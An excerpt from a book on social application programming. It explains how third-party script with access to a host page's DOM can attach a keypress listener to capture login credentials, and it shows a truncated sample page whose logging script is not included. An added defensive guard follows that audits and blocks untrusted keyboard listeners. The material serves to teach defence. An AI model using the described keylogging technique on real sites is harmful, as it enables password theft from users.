Programming Social Applications by Jonathan LeBlanc

Logging the User’s Keystrokes

If the third-party application has the ability to access the true DOM of a page, then it can log the user’s keystrokes. The severity of this attack can range from a simple nuisance all the way to a major security issue if the root page contains password fields or user-specific information.

A probable attack vector for this type of code is to capture the user’s username and password fields. Since a password field would prevent direct access to its value, logging the user’s keystrokes can provide the attacker with all of the information he needs.

For instance, say we have a site that hosts third-party code. On this site, you have a username and password field to allow you to log in. Should this third-party code attach a keypress event on the body of the root page document, then it can log any keys that you press while you are on the page.

This type of attack can be perpetrated by any script that can essentially “phone home” by accessing the parent page that it is being presented on, much like the following sample:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>Key Logger Attack</title>
</head>
<body>
   <!-- username field -->
   <label for="username">Username:</label>
   <input type="text" id="username" name="username" /><br />

   <!-- password field -->
   <label for="password">Password:</label>
   <input type="password" id="password" name="password" />

   <!-- node to dump logged keys to -->
   <div id="dumpNode"></div>

   <script type="text/javascript">
   ...
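The exposure in this sample is the third-party script's ability to attach a keyboard listener to the root document. The following audit guard is an added example, not code from the book, written from the host page's side: it logs every keyboard-listener registration on a root node and refuses those from script origins the host does not trust. The names installKeyListenerGuard, callerOrigin and TRUSTED, and the Error.stack heuristic for finding the caller's origin, are this example's own assumptions.

```javascript
// Added example, not from the book: an audit guard for keyboard-listener
// registrations on a shared root node (window, document, document.body).
// A keylogger has to register a keydown/keypress/keyup handler somewhere on
// the path keystrokes bubble along; the guard records each such registration
// and drops those the host's policy does not trust. It is an audit aid
// layered on top of real isolation (serving third-party code from a
// separate-origin iframe), not a replacement for it: code that already
// holds a reference to the unpatched method is not stopped by it.
const KEY_EVENTS = new Set(['keydown', 'keypress', 'keyup', 'input']);

// Best-effort origin of the script calling into the guard, read from
// Error.stack. Frame 0 is the guard's own wrapper, so the caller is the
// next frame carrying a URL. Browsers print script URLs; Node prints file
// paths, so this yields null there. A heuristic, not a security boundary.
function callerOrigin(stack, skip = 1) {
  const origins = [];
  for (const m of (stack || '').matchAll(/https?:\/\/[^/\s)]+/g)) {
    origins.push(m[0]);
  }
  return origins.length > skip ? origins[skip] : null;
}

// Patch addEventListener on one target. isTrustedOrigin(origin) is the
// host's policy callback. Returns the audit log for later inspection.
function installKeyListenerGuard(target, isTrustedOrigin) {
  const original = target.addEventListener.bind(target);
  const log = [];
  target.addEventListener = function (type, listener, options) {
    if (KEY_EVENTS.has(type)) {
      const origin = callerOrigin(new Error().stack);
      const allowed = Boolean(isTrustedOrigin(origin));
      log.push({ type, origin, allowed });
      if (!allowed) return;            // refuse the untrusted registration
    }
    return original(type, listener, options);
  };
  return log;
}

// Browser wiring (hypothetical host page, run once body exists): guard every
// node keystrokes bubble to. TRUSTED is a constructed first-party allow-list.
if (typeof document !== 'undefined') {
  const TRUSTED = new Set([location.origin]);
  const policy = (origin) => TRUSTED.has(origin);
  [window, document, document.body].forEach((node) => {
    node.__keyAudit = installKeyListenerGuard(node, policy);
  });
}
```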
